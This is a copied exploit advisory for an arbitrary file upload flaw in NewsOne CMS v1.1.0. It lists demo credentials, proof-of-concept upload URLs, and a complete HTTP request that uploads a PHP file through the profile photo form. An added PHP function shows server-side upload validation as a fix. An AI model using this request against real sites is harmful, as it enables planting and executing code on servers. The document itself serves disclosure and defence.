
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020010143

Below is a copy:

NewsOne CMS News, Magazine & Blog Script v1.1.0 Arbitrary File Upload
# Exploit Title: NewsOne CMS News, Magazine & Blog Script v1.1.0 Arbitrary File Upload
# Google Dork: -
# Date: 18/01/2020
# Exploit Author: m0ze
# Vendor Homepage: http://www.newsone.dx.am/index/index
# Software Link: https://codecanyon.net/item/newsone-news-magazine-blog-script/25384256
# Version: 1.1.0
# Tested on: Kali Linux
# CVE: -
# CWE: 434


----[]- Info: -[]----
Demo website: http://www.newsone.dx.am/index/index
Demo account: member/member12345 (login/password)
PoC Upload #0: http://www.newsone.dx.am/Application/Content/uploads/profile/up-up.php
PoC Upload #1: http://www.newsone.dx.am/Application/Content/uploads/profile/index.html
PoC Upload #2: http://www.newsone.dx.am/Application/Content/uploads/profile/up.phtml
PoC Upload #3: http://www.newsone.dx.am/Application/Content/uploads/profile/poc.php?m0ze&email=_your_email_here_


----[]- Arbitrary File Upload -> User Profile: -[]----
Authenticate as a regular user (member/member12345, for example) and upload any file you want on the http://www.newsone.dx.am/auth/edit page via the <input type="file" name="user_image"> field.

PoC:

POST /auth/edit HTTP/1.1
Host: www.newsone.dx.am
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------18467633426500
Content-Length: 501
Origin: http://www.newsone.dx.am
Connection: close
Referer: http://www.newsone.dx.am/auth/edit
Cookie: _your_cookies_here_
Upgrade-Insecure-Requests: 1

-----------------------------18467633426500
Content-Disposition: form-data; name="member_id"

4
-----------------------------18467633426500
Content-Disposition: form-data; name="user_image"; filename="phpinfo.php"
Content-Type: application/octet-stream

<?php
phpinfo();
?>
-----------------------------18467633426500
Content-Disposition: form-data; name="edit_user_photo"

Update Profile Photo
-----------------------------18467633426500--
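
A server-side check that would reject the phpinfo.php upload in the request above, as an added example that is not part of the original advisory or the vendor's code. The function name, the size limit and the destination directory are assumptions; NewsOne's own upload handler is not shown on this page.

```php
<?php
declare(strict_types=1);

// Added example (hypothetical helper, not NewsOne code).
// Detected MIME type => extension chosen by the server, never by the client.
const ALLOWED_IMAGE_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

/**
 * Validate and store a profile photo; returns the stored file name.
 * $upload is one $_FILES entry, e.g. $_FILES['user_image'].
 * $destDir (assumption) is a directory where the web server serves files
 * statically and does not execute .php/.phtml or render uploaded .html.
 */
function store_profile_image(array $upload, string $destDir, int $maxBytes = 2097152): string
{
    if (($upload['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload missing or failed.');
    }
    $tmp = (string) ($upload['tmp_name'] ?? '');
    if (!is_uploaded_file($tmp)) {
        throw new RuntimeException('Not an HTTP upload.');
    }
    $size = (int) ($upload['size'] ?? 0);
    if ($size <= 0 || $size > $maxBytes) {
        throw new RuntimeException('File size out of range.');
    }
    // Type comes from the file content. The client-supplied filename and
    // Content-Type (application/octet-stream in the request above) are ignored.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmp);
    if (!is_string($mime) || !array_key_exists($mime, ALLOWED_IMAGE_TYPES)) {
        throw new RuntimeException('Only JPEG, PNG or GIF images are accepted.');
    }
    // The content must also parse as an image.
    if (@getimagesize($tmp) === false) {
        throw new RuntimeException('File is not a valid image.');
    }
    // Random name plus allowlisted extension: nothing from the original
    // filename ("phpinfo.php", "up.phtml", ...) reaches the file system.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_IMAGE_TYPES[$mime];
    if (!move_uploaded_file($tmp, rtrim($destDir, '/') . '/' . $name)) {
        throw new RuntimeException('Could not store the file.');
    }
    return $name;
}
// Usage (constructed path): store_profile_image($_FILES['user_image'], '/srv/uploads/profile');
```

Content checks alone can be passed by an image that carries script text in its metadata, so the server-chosen extension and a non-executing upload directory are what prevent the stored file from running.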

Copyright ©2020 Exploitalert.
